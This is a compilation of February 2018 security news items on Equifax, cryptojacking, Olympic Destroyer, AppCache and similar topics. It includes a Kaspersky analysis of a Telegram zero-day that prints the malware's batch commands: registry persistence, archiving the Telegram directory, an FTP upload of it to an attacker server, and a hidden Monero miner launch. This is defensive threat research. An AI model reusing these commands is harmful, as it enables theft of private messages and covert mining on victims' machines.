Seagate, RackTop Launch Secure Data Storage Product for Governments
13.2.2018 securityweek BigBrothers
Seagate Technologies and RackTop Systems on Tuesday announced a partnership and their first product, a secure data storage solution designed to help government organizations address cybersecurity and compliance challenges.

The joint product from RackTop and Seagate is the Secure Data Protection Platform (SDP2), a storage solution designed to help government organizations, civilian agencies, military agencies, and contractors in the United States and Europe protect sensitive data against both insider and external threats.

Seagate and RackTop join forces to launch a data protection platform for governments

SDP2 combines encryption key management from Fornetix, a high-performance software-defined storage platform from RackTop, and disk drives and enclosures from Seagate.Seagate and RackTop join forces to launch a data protection platform for governments

The companies claim the new product is compliant with the Trade Agreements Act (TAA), the Buy American Act (BAA), NIST 800-88 (guidelines for media sanitization), NIST 800-171 (protecting unclassified data on nonfederal IT systems), FIPS 140-2 (federal standard for approving cryptographic modules), and the European Union’s upcoming General Data Protection Regulation (GDPR).

According to Seagate and RackTop, SDP2 can be used for file sharing, virtual machine storage, databases, and DevOps. It includes policy-driven data protection, anti-ransomware mechanisms, and auditing and reporting features.

The product provides encryption, versioning, orchestration, replication, retention and disposition capabilities. The solution is ideal for both small offices and data centers as it can easily scale from a few terabytes to multiple petabytes, the vendors said.

“Seagate Government Solutions is pleased to partner with RackTop to create exceptional data security solutions to meet rising risk management standards,” said Mike Moritzkat, vice president and general manager of Seagate Government Solutions. “The Secure Development Protection Platform – or SDP2 – is the first of many products Seagate is delivering to meet increasingly-stringent data security regulations in both the U.S. and EU.”


Major Browser Vendors to Restrict AppCache to Secure Connections
13.2.2018 securityweek
Attack
Major web browser vendors plan on restricting the use of the Application Cache (AppCache) feature to secure connections in an effort to protect users against potential attacks.

Mozilla on Monday was the first to make an official announcement, but the developers of Chrome, Edge and WebKit (the layout engine used by Apple’s Safari) said they plan on doing the same.

AppCache is an HTML5 application caching mechanism that allows website developers to specify which resources should be available offline. This improves speed, reduces server load, and enables users to browse a site even when they are offline.

While application caching has some benefits, it can also introduce serious security risks, which is partly why it has been deprecated and its use is no longer recommended.

The problem is that AppCache does not properly revalidate its cache, making it possible for man-in-the-middle (MitM) attackers to load malicious content. Mozilla has described the following attack scenario:

“A user logs onto a coffee shop WiFi where an attacker can manipulate the WiFi that is served over HTTP. Even if the user only visits one HTTP page over the WiFi, the attacker can plant many insecure iframes using AppCache which allows the attacker to rig the cache with malicious content manipulating all of those sites indefinitely. Even a cautious user who decides only to login to their websites at home is at risk due to this stale cache.”

Mozilla has already banned access to AppCache from HTTP pages in Firefox 60 Nightly and Beta, and will do the same in the main branch starting with Firefox 62, scheduled for release in early May.

Mozilla says it will continue to remove features for websites using HTTP and advised developers to implement TLS encryption in order to preserve current functionality.

“Going forward, Firefox will deprecate more APIs over insecure connections in an attempt to increase adoption of HTTPS and improve the safety of the internet as a whole,” explained Mozilla’s Jonathan Kingston.

Google Chrome developers initiated a discussion on removing AppCache on insecure origins back in 2016, but failed to find a solution. Following Mozilla’s lead, the Chrome team has picked up discussions on this topic on February 2.

Microsoft reportedly started making plans for AppCache restriction last week and WebKit developers are also looking into making changes. Some modifications will also be made in the HTML standard.


Litecoin, Dash to Dethrone Bitcoin on Dark Web: Report
13.2.2018 securityweek CoinMine
Litecoin and Dash are expected to replace Bitcoin as the most used payment method on underground portals and cybercriminal marketplaces, Recorded Future suggests in a new report.

For the past couple of years, cybercriminals from all geographies and of all languages have been dissatisfied with the performance and cost of Bitcoin transactions, and forum discussions suggest alternate payment methods would soon surge.

At the moment, Bitcoin remains the most popular crypto-currency on the Dark Web, followed by Litecoin, an analysis (PDF) of 150 of the most prominent message boards, marketplaces, and illicit services on the Dark Web has revealed. Dash is also a top preference among members of the Dark Web, the same as Monero, Recorded Future's researchers discovered.

The diminished popularity of Bitcoin appears to be derived from the larger payment fees that have been registered since mid-2017. The crypto-coin itself has increased in value, but this also fueled a spike in fees for small transactions.

“The underground economy is dependent on smaller transactions in its day-to-day operations, with the cost of the average product or service beginning between $50 and $300. With the addition of exuberant transaction fees, the price of such products and services suddenly inflates tremendously,” Recorded Future notes.

In addition to these high fees, which could sometimes amount to 30% of the transaction value, cybercriminals would also have to face delays in the completion of transactions, derived from an adopted rule of requiring three confirmations before treating transactions as complete.

“The prospect of having to wait up to 24 hours to confirm their transactions, in addition to exuberant payment fees, has rendered Bitcoin payments unusable for a large group of bad guys,” the researchers point out.

Based on underground discussions and fueled by overwhelming support and references to it, Dash appeared to emerge as the next major Dark Web currency, but the crypto-coin didn’t live to the expectations. However, it did prove highly popular on many dark portals, as many migrated to it in detriment of Bitcoin.

Despite its constant appearance in cyber-attacks – in incidents targeting web servers, end user computers (via malware or in-browser scripts), IoT devices, and ICS systems with mining software – over the past year, Monero didn’t manage to claim the top position either.

Monero did take the top position in a poll among “several hundreds of members of a popular criminal forum” on the crypto-coin expected to be adopted next, Recorded Future’s report reveals.

“Our subsequent research showed that the vendors alone represent the primary deciding factor regarding which payments will be implemented and which will not,” the security firm says.

Following the analysis of 150 of the most prominent Dark Web portals, the researchers discovered that Bitcoin remains the standard, as all vendors accept it as a payment. The second most popular crypto-coin is Litecoin, being accepted by 30% of all vendors who implemented alternative payment methods.

Dash landed on the third position, being accepted by 20% of these vendors, followed by Bitcoin Cash at 13%. Ethereum and Monero round up the list, at 9% and 6%, respectively.

Reasons Litecoin is the second most popular crypto-currency after Bitcoin include the fact that it is also the second oldest, being introduced in 2011. Intended as a superior version of Bitcoin, its core technology is nearly identical to Bitcoin’s, but it allows for faster transactions and significantly lower commission fees.

However, it doesn’t offer any additional security to its owner, the researchers point out. Just as with Bitcoin, Litecoin transactions are entirely transparent.

The security firm discovered that Litecoin is second most preferred on 35% of Eastern European underground portals, followed by Dash at 24%, and Bitcoin Cash at 15%. On English speaking Dark Web portals, however, Monero is the second most popular, at 15%, followed by Litecoin at 11%.

“While Russians favored the accessibility and convenience of Litecoin, with a more diverse and established supporting infrastructure, English-speaking members seem to be more security-oriented, choosing Monero for its built-in safety features,” Recorded Future notes.

The security researchers expect the cryptocurrency diversification trend to only intensify and suggest that Bitcoin might lose its dominant position among payment methods on the Dark Web in the next six to 12 months. However, it is expected to remain one of the main payment instruments.

“On the other hand, Litecoin and Dash will take their place next to Bitcoin as the everyday payment currencies of the dark web. At the same time, as these currencies become more readily available to a general population, malicious tools such as ransomware will also continue to evolve to take advantage of the mainstream trend,” the researchers conclude.


Microsoft Brings Windows Defender ATP to Windows 7, 8.1
13.2.2018 securityweek Safety
Microsoft on Monday announced plans to make Windows Defender Advanced Threat Protection (ATP) available for Windows 7 SP1 and Windows 8.1 devices.

First announced in early 2016, Windows Defender ATP was packed in Windows 10 in an attempt to harden the platform and provide users with a unified endpoint security tool.

Improvements made to Windows Defender ATP since include protection against code injection attacks, detection of suspicious PowerShell activities, and the ability to fend off emerging threats via Windows Defender Exploit Guard.

While these enhancements make Windows 10 a more secure platform, organizations that use a mixture of Windows 7 and Windows 10 devices remain exposed to attacks, and Microsoft aims at tackling the issue with the addition of support for older platform iterations in Windows Defender ATP.

“Starting this summer, customers moving to Windows 10 can add Windows Defender ATP Endpoint Detection & Response (EDR) functionality to their Windows 7, and Windows 8.1 devices, and get a holistic view across their endpoints,” Rob Lefferts, Partner Director, Windows & Devices Group, Security & Enterprise, Microsoft, notes in a blog post.

Windows 7 and Windows 8.1 will get a behavioral based EDR solution to provide insight into threats on an organization’s endpoints. All events are logged in the Windows Defender Security Center, which is the cloud-based console for Windows Defender ATP.

“Security teams benefit from correlated alerts for known and unknown adversaries, additional threat intelligence, and a detailed machine timeline for further investigations and manual response options,” Lefferts notes.

He also notes that the solution will allow organizations to run third-party antivirus solutions on the endpoints, although pairing it with Windows Defender Antivirus (also known as System Center Endpoint Protection (SCEP) for down-level) would be the best option. The advantage when using it with Windows Defender Antivirus would be that both malware detections and response actions would be available in the same console.

Microsoft plans on providing its customers with access to a public preview of the down-level EDR solution in spring, so that security teams would learn more on what the solution has to offer in terms of detecting suspicious behavior on Windows 7 and Windows 8.1 devices.

Making Windows Defender ATP available for older Windows releases is only one more step Microsoft makes in its attempt to broaden the availability of its security product. In November, the company announced partnerships to bring the tool to macOS, Linux, iOS, and Android devices as well.

On Monday, SentinelOne revealed plans to bring Windows Defender ATP to its Mac and Linux users too, courtesy of integration with the SentinelOne Endpoint Protection Platform (EPP). The company is already providing customers with beta access to the solution.

Once the planned integration is complete, new events from onboarded MacOS and Linux devices will start natively surfacing into the Windows Defender ATP console, without the need for additional infrastructure, the company says.

“With Windows Defender ATP for Windows 10, Windows Server 2012R2 and 2016, now for Windows 7 and Windows 8.1 and our partner integration for non-Windows devices, we give security teams a single solution to detect and respond to advanced attacks across the majority of their endpoints,” Lefferts concludes.


New details emerge from Equifax breach, the hack is worse than previously thought
13.2.2018 securityaffairs Incindent

New documents provided by Equifax to senators revealed that the security breach suffered by the firm involved additional data for some customers.
In 2017 Equifax confirmed it has suffered a massive data breach, cyber criminals stole sensitive personal records of 145 million belonging to US citizens and hundreds of thousands Canada and in the UK.

Attackers exploited the CVE-2017-5638 Apache Struts vulnerability. The vulnerability affects the Jakarta Multipart parser upload function in Apache and could be exploited by an attacker to make a maliciously crafted request to an Apache web server.

The vulnerability was fixed back in March, but the company did not update its systems, the thesis was also reported by an Apache spokeswoman to the Reuters agency.

Compromised records include names, social security numbers, birth dates, home addresses, credit-score dispute forms, and for some users also the credit card numbers and driver license numbers.

Now experts argue the Equifax hack is worse than previously thought, according to documents provided by Equifax to the US Senate Banking Committee the attackers also stole taxpayer identification numbers, phone numbers, email addresses, and credit card expiry dates belonging to some Equifax customers.

This means that crooks have all necessary data to arrange any king of fraud by steal victims’ identities.

Equifax data breach

“As your company continues to issue incomplete, confusing and contradictory statements and hide information from Congress and the public, it is clear that five months after the breach was publicly announced, Equifax has yet to answer this simple question in full: what was the precise extent of the breach?” criticized Senator Elizabeth Warren (D-MA) who disclosed the documents.

Equifax pointed out that additional info exposed after the security breach are only related to a limit number of users.

Another curious thing to observe about the Equifax case, it that C-Level management was allowed to retire with multi-million dollar severance pays.

On Monday, the company announced Jamil Farshchi as its Chief Information Security Officer (CISO), he replaces Chief Security Officer Susan Mauldin, who retired from the company after the data breach was disclosed in late 2017.


Zero-day vulnerability in Telegram

13.2.2018 Kaspersky  Vulnerebility
Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell
The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.


Mikko Hypponen
@mikko
New Mac Malware uses Right-to-Left override character (U+202E) to cause OS X to display this… http://www.f-secure.com/weblog/archives/00002576.html …

15:52 - 15 июл. 2013 г.
30
127 человек(а) говорят об этом
Информация о рекламе в Твиттере и конфиденциальность
Launching an attack on Telegram
Below is an account of how this vulnerability was exploited in Telegram:

The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:
evil.js -> photo_high_re*U+202E*gnp.js
Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js.

The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:
 

When the user clicks on this file, the standard Windows security notification is displayed:
 

Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.

Exploitation in the wild
After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control
The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules.

 

At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol:
 

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:
 

When launched, it modifies startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment:
 

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:
 

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:

Command
(English translation) Function
“Онлайн
(“Online) Send list of files in directory to control bot.
“Запус
(“Launch) Launch executable file using Process.Start().
“Логгер
(“Logger) Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content.
“Скачать
(“Download) Download file into its own directory.
“Удалить
(“Delete) Delete file from its own directory.
“Распаковать
(“Unpack) Unpack archive in its own directory using specified password.
Убить
(Kill) Terminate specified process using process.Kill()
Скачат
(Download) Same as ‘Download’ (see above), with different command parsing.
Запуск
(Launch) Same as ‘Launch’ (see above), with different command parsing.
Удалить
(Delete) Same as ‘Delete’ (see above), with different command parsing.
Распаковать
(Unpack) Same as ‘Unpack’ (see above), with different command parsing.
Процессы
(Processes) Send a list of commands running on target PC to control bot.
An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user.

Miners and more
Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet.

Scenario #1
 

At the first stage of the attack, an SFX archive with a script is used that launches an executable file:

Path=%temp%\adr
Setup=%temp%\adr\run.exe
Silent=1
Overwrite=2

This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:
 

As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security.

Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.

nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator:

 

taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path:

 

We have seen several versions of this batch script, some of which have extra features:
 

This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:
 

The attack flowchart is approximately as follows:
 

We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware.
 

The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents:
 

All components named st*.exe are executable PE files converted in a similar way from batch scripts.

The SFX script launches the component st1.exe:

Path=%temp%/adress
Setup=%temp%/adress/st1.exe
Silent=1
Overwrite=2

st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:

reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f

So the st2.exe file launches when system is booted next time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%\sss
cd %temp%\sss #Creates a temporary directory
“%temp%\adress\WinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%\sss\1.rar” “%appdata%\Telegram Desktop” #Packs the Telegram directory into a RAR archive
TIMEOUT /T 60 /NOBREAK
:begin
ping -n 1 ya.ru |>nul find /i “TTL=” && (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe

As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:

@echo XXXXXXXX>command.txt
@echo XXXXXXXX>>command.txt
@echo binary>>command.txt
@echo mput %temp%\sss\*.rar>>command.txt
@echo quit>>command.txt
ftp -s:command.txt -i free11.beget.com
del command.txt
attrib %temp%/adress +H
attrib %temp%/adress\* +H

On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims:
 

Each dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos.

Scenario #2
 

Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:
 

The payload is an SFX archive with the following script:
 

svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.

The script contains the appropriate comments:
 

The miner itself is launched as follows:

WshShell.Run “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, 0

The pool address is associated with the cryptocurrency Monero.

On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:
 

Conclusion
It appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected occurring in Russia. Also, while conducting a detailed research of these attacks we discovered a lot of artifacts that pointed to involvement by Russian cybercriminals.

We don’t have exact information about how long and which versions of the Telegram products were affected by the vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.

This paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and other methods of exploitation remain unknown.

IoC
MD5
First stage
650DDDE919F9E5B854F8C375D3251C21
C384E62E483896799B38437E53CD9749
FA391BEAAF8B087A332833E618ABC358
52F7B21CCD7B1159908BCAA143E27945
B1760E8581F6745CBFCBE76FBD0ACBFA
A662D942F0E43474984766197288845B

Payloads
B9EEC74CA8B14F899837A6BEB7094F65
46B36F8FF2369E883300F472694BBD4D
10B1301EAB4B4A00E7654ECFA6454B20
CD5C5423EC3D19E864B2AE1C1A9DDBBC
7A3D9C0E2EA27F1B96AEFED2BF8971A4
E89FDDB32D7EC98B3B68AB7681FACCFC
27DDD96A87FBA2C15B5C971BA6EB80C6
844825B1336405DDE728B993C6B52A83
C6A795C27DEC3F5559FD65884457F6F3
89E42CB485D65F71F62BC1B64C6BEC95
0492C336E869A14071B1B0EF613D9899
2CC9ECD5566C921D3876330DFC66FC02
1CE28167436919BD0A8C1F47AB1182C4

C2 servers
http://nord.adr[.]com[.]ua/

Filenames
name?gpj.exe
name?gpj.rar
address?gpj.scr
address_?gpj.scr
photoadr?gepj.scr


Thousands of Government Websites Hacked to Mine Cryptocurrencies
13.2.2018 thehackernews CoinMine

There was a time when hackers simply defaced websites to get attention, then they started hijacking them to spread banking trojan and ransomware, and now the trend has shifted towards injecting scripts into sites to mine cryptocurrencies.
Thousands of government websites around the world have been found infected with a specific script that secretly forces visitors' computers to mine cryptocurrency for attackers.
The cryptocurrency mining script injection found on over 4,000 websites, including those belonging to UK's National Health Service (NHS), the Student Loan Company, and data protection watchdog Information Commissioner's Office (ICO), Queensland legislation, as well as the US government's court system.
Users who visited the hacked websites immediately had their computers' processing power hijacked, also known as cryptojacking, to mine cryptocurrency without their knowledge, potentially generating profits for the unknown hacker or group of hackers.
It turns out that hackers managed to hijack a popular third-party accessibility plugin called "Browsealoud," used by all these affected websites, and injected their cryptocurrency-mining script into its code.
Browsealoud is a popular third-party browser plugin that helps blind and partially-sighted users access the web by converting site text to audio.
The script that was inserted into the compromised Browsealoud software belongs to CoinHive—a browser-based Monero mining service that offers website administrators to earn revenue by utilizing CPU resources of visitors.
The mining software was found in more than 4,200 websites, including The City University of New York (cuny.edu), Uncle Sam's court information portal (uscourts.gov), the UK's Student Loans Company (slc.co.uk), privacy watchdog The Information Commissioner's Office (ico.org.uk) and the Financial Ombudsman Service (financial-ombudsman.org.uk), UK NHS services, Manchester.gov.uk, NHSinform.scot, agriculture.gov.ie, Croydon.gov.uk, ouh.nhs.uk, legislation.qld.gov.au, the list goes on.
The full list of affected websites can be found here.
After UK-based infosec consultant Scott Helme raised the alarm about this hack when one of his friends mentioned getting anti-virus alerts on a UK Government website, BrowseAloud’s operator Texthelp took down its site to resolve the issue.
Here’s what Texthelp's chief technology officer Martin McKay said in a blog post:
"In light of other recent cyber attacks all over the world, we have been preparing for such an incident for the last year. Our data security action plan was actioned straight away and was effective, the risk was mitigated for all customers within a period of four hours."
"Texthelp has in place continuously automated security tests for Browsealoud - these tests detected the modified file, and as a result, the product was taken offline."
This action eventually removed Browsealoud from all websites immediately, addressing the security issue without its customers having to take any action.
The company also assured that "no customer data has been accessed or lost," and that its customers will receive a further update as soon as the security investigation gets completed.


Cryptocurrency Miners Not Uncommon on Industrial Systems
13.2.2018 securityweek  CoinMine
Cryptocurrency miners can pose a serious threat to industrial systems and it’s not uncommon for this type of malware to make its way into operational technology (OT) environments.

Industrial cybersecurity firm Radiflow reported last week that it had identified a piece of malware designed to mine Monero on a human-machine interface (HMI) system at a wastewater facility in Europe. The company warned that the resource consumption associated with this type of malware can severely disrupt plant monitoring tools and the affected organization’s response times.

Cryptocurrency mining malware has become increasingly widespread and it has recently been found even on numerous government websites in the United States, the United Kingdom and Australia.

This type of malware is also fairly common on industrial systems, according to several cybersecurity firms contacted by SecurityWeek.

A study conducted last year by Dragos showed that roughly 3,000 unique industrial sites had been hit by traditional, non-targeted malware. The company discovered approximately 6,000 malware infections, including instances of cryptojacking, said Robert M. Lee, CEO and founder of Dragos.

Kaspersky Lab ICS-CERT told SecurityWeek that roughly 3.3 percent of the industrial control systems (ICS) monitored by the company between February 2017 and February 2018 were targeted with cryptocurrency miners, with an increasing trend observed since September 2017.

Cryptocurrency miners on industrial systems - Credits: Kaspersky Lab ICS-CERT

“Industrial infrastructure is an appealing target for mining attacks due to high power, meaning criminals can earn more in less time. As usually the case with miners, users might notice slowdown of programs and systems performance that inevitably affects the user experience in general,” Kaspersky Lab ICS-CERT said. “In terms of ICS, a spike in CPU load, as a result of miners’ infection, leads to an increase in response time of monitoring tools for SCADA/HIM servers. It’s important to note that most of the ICS are real-time systems designed for process control, where response time is the critical system indicator.”

Darktrace, a security firm known for its AI-based defense technology, said it had identified more than 20 cryptocurrency miner attacks over the past six months among its customers in the energy and utilities sectors.

Overall, Darktrace said it had identified more than 400 crypto-mining related incidents across 5,000 customer deployments in more than 30 industries. There has been a steady increase in the number of detections, with roughly 100 mining scripts and cryptocurrency malware incidents detected in January.

CyberX used the Shodan search engine to locate a European wastewater facility infected with cryptocurrency mining malware. Just like in the incident described by Radiflow, the threat had been found on an HMI device running CIMPLICITY software from GE Digital. The industrial cybersecurity firm managed to grab a screenshot of the infected HMI.

HMI in European wastewater facility infected with cryptocurrency miner - Credits: CyberX

While the infection vector is not known, CyberX VP of Research David Atch pointed out that older versions of the CIMPLICITY software are affected by CVE-2014-0751, a path traversal vulnerability that can be exploited for arbitrary code execution. This flaw was exploited a few years ago by Russia-linked hackers to deliver the BlackEnergy malware.

“Although it's widely believed that Black Energy was developed by a state-sponsored hacking group (most likely Sandworm aka Telebots), the vulnerability is relatively easy to exploit and therefore it's easy to imagine that non-state actors such as cybercriminal organizations now have access to tools that can exploit the same vulnerability,” Atch explained.


Equifax Hires Former Home Depot Security Chief Jamil Farshchi as CISO
13.2.2018 securityweek  Incindent
Credit reporting agency Equifax announced on Monday that it has named Jamil Farshchi as its Chief Information Security Officer (CISO).

Farshchi replaces Equifax Chief Security Officer Susan Mauldin, who abruptly retired from the company after a massive data breach was disclosed in late 2017.

Farshchi previously served as CISO at The Home Depot, where he was hired in March 2015 after Home Depot suffered a massive data breach. Before Farshchi took the reigns as CISO at the home improvemt company, cybercriminals managed to steal email addresses and payment card data belonging to more than 56 million Home Depot customers in 2014.

According to Equifax, Farshchi will be based in Atlanta and assume “company-wide leadership of work already underway to transform the company's information security program, and collaborate with the industry to share best practices on information security.”

He will report to the Chief Executive Officer, the company said.

"Jamil has a reputation for helping enterprises rebuild and fortify information security programs,” Paulino do Rego Barros, Jr., interim Chief Executive Officer at Equifax, said in a statement. “His expertise in risk intelligence and cybersecurity combined with his intimate knowledge of industry best practices will allow us to design and deploy a best-in-class, global security strategy to re-establish ourselves as a trusted leader."

Prior to his role at The Home Depot, Farshchi was the first Global CISO at Time Warner. Before that, he was the Vice President of Global Information Security at Visa. Farshchi has also held senior roles at Los Alamos National Laboratory, Sitel Corporation, Nextwave Broadband, and NASA.

He holds a master's degree from the University of Pennsylvania’s Wharton Business School and a bachelor's degree in Business Administration from the University of Oklahoma.

"Equifax is a company with tremendous potential, and I am confident that we will transform our security program into one of the most advanced and recognized globally," said Farshchi. "I am grateful for this new challenge and am looking forward to enabling the business with new insights, a fresh perspective, and a multi-dimensional way of thinking about global data stewardship and information security."

In September 2017, Equifax revealed that hackers had accessed its systems between mid-May and late July 2017. The company eventually said the breach affected roughly 145 million customers – mostly in the U.S., but also in Canada and the United Kingdom – including their social security numbers, dates of birth, addresses, and in some cases driver’s license numbers, payment cards, and dispute documents.

Documents provided recently by Equifax to senators revealed that the breach suffered by the company last year may have involved types of data not mentioned in the initial disclosure of the incident.


Pyeongchang – Olympic Destroyer Unleashed to Embarrass Pyeongchang 2018 Games
13.2.2018 securityaffairs Cyber

Shortly before the Pyeongchang opening ceremonies on Friday, televisions at the main press centre, wifi at the Olympic Stadium and the official website were taken down.
It is well known that big events attract the attention of hackers. The biggest event right now is the 2018 Winter Olympics in Pyeongchang, South Korea and it looks like the hackers have arrived. Shortly before the opening ceremonies on Friday, televisions at the main press centre, wifi at the Olympic Stadium and the official website were taken down. All systems were restored by 8AM on the following Saturday, and although individuals were unable to print event tickets during the outage, the organizing committee described the event as affecting only “noncritical systems.” Given the high profile of the games, the rumor mill immediately began spreading whispers that the outage was the result of a cyberattack.

After restoring services and investigating the cause, Sunday evening Pyeongchang 2018 spokesperson Sung Baik-you issued an official statement confirming that the outage resulted from a cyber attack.

“There was a cyber-attack and the server was updated yesterday during the day and we have the cause of the problem”, Sung Baik-you said.

Leading up to the Olympic Games there was a lot of speculation whether North Korea would attempt to disrupt the games. Along with China and Russia, North Korean cyberwarfare teams are often suspected in large-scale attack such as these. In this case, the International Olympics Committee (IOC) is refusing to participate in any speculation as to the source of the attacks.

“We wouldn’t start giving you the details of an investigation before it has come to an end, particularly because it involves security which at these games is incredibly important. I am sure you appreciate we need to maintain the security of our systems,” said Mark Adams, head of communications for the IOC.

While the IOC and Pyeongchang spokespeople are being cautious about releasing details to focus on ensuring security and safety of the games, Cisco Talos has been forthcoming with technical details of the attack. While they haven’t pointed fingers at specific attackers, but in a Talos blog post on February 12, they have stated, “[samples identified] are not from adversaries looking for information from the games but instead they are aimed to disrupt the games.”

Pyeongchang

According to their research, there are many similarities between the Pyeongchang attack, which they are dubbing “Olympic Destroyer”, and earlier attacks such as BadRabbit and NotPetya. All of these attacks are focused on destruction and disruption of equipment not exfiltration of data or other, more subtle attacks. Using legitimate tools such as PsExec and WMI the attackers are specifically targeting the pyeongchang2018.com domain attempting to steal browser and system credentials to move laterally in the network and then wiping the victim computer to make it unusable.

While the source of the attacks is uncertain, the Cisco Talos blog post is clear in identifying motivation, “Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony.”


Victims of some versions of the Cryakl ransomware can decrypt their files for free
13.2.2018 securityaffairs
Ransomware

Free decryption keys for the Cryakl ransomware were added to the free Rakhni Decryptor that could be downloaded on the NoMoreRansom website.
The Belgian Federal Police has located the command and control server used by a criminal organization behind the Cryakl ransomware. The server was located in an unspecified neighboring country, law enforcement seized it and shared the decryption keys found on the machine with the No More Ransom project.

“The Belgian Federal Police is releasing free decryption keys for the Cryakl ransomware today, after working in close cooperation with Kaspersky Lab. The keys were obtained during an ongoing investigation; by sharing the keys with No More Ransom the Belgian Federal Police becomes a new associated partner of the project – the second law enforcement agency after the Dutch National Police.” reads the statement published by the Europol.

“Led by the federal prosecutor’s office, the Belgian authorities seized this and other servers while forensic analysis worked to retrieve the decryption keys. Kaspersky Lab provided technical expertise to the Belgian federal prosecutor and has now added these keys to the No More Ransom portal on behalf of the Belgian federal police. This will allow victims to regain access to their encrypted files without having to pay to the criminals.”

The “exponential” rise in Ransomware threat represents a serious problem for users online and it is a profitable business for cyber criminals. The operation NO More Ransom is the response of the Europol of the growing threat.

Cryakl ransomware

Victims of Cryakl ransomware can recover encrypted files using the Rakhni Decryptor available for free from Kaspersky Lab or NoMoreRansom at the following URL.

The tool works with most versions of the Cryakl ransomware, but researchers at MalwareHunterTeam confirmed that it doesn’t work with CL 1.4.0 and newer (so 1.4.0 is included in what can’t be decrypted).

It has been estimated that the tool has helped more than 35,000 victims of ransomware to decrypt their files for free, an overall loss for crooks of over €10m.

“There are now 52 free decryption tools on www.nomoreransom.org, which can be used to decrypt 84 ransomware families. CryptXXX, CrySIS and Dharma are the most detected infections.” continues the statement.

The Belgian authorities are still investigating the case.


Lenovo Patches Critical Wi-Fi Vulnerabilities
12.2.2018 securityweek
Vulnerebility
Lenovo has released patches for two critical vulnerabilities that were found last year in certain Broadcom Wi-Fi controllers.

Identified as CVE-2017-11120 and CVE-2017-11121, the two issues were discovered by Google Project Zero and were publicly disclosed in September 2017.

Both vulnerabilities affect Broadcom Wi-Fi chips found in many mobile devices, thus having an industry-wide impact. Both were addressed in the Android and iOS operating systems in September last year.

When disclosing the bugs, Gal Beniamini of Google Project Zero explained that an attacker within Wi-Fi range could exploit CVE-2017-11120, an out-of-bounds write issue, to achieve arbitrary code execution on an impacted device.

“Upon successful execution of the exploit, a backdoor is inserted into the firmware, allowing remote read/write commands to be issued to the firmware via crafted action frames (thus allowing easy remote control over the Wi-Fi chip),” the researcher said.

CVE-2017-11121 can be abused by means of malicious over-the-air Fast Transition frames designed to trigger internal Wi-Fi firmware heap and/or stack overflows. This could lead to remote code execution as well.

“Broadcom has issued an advisory for certain Broadcom WiFi controllers used by many computer and device makers, which contain buffer overflow vulnerabilities on the adapter (not the system CPU),” Lenovo noted in an advisory last week.

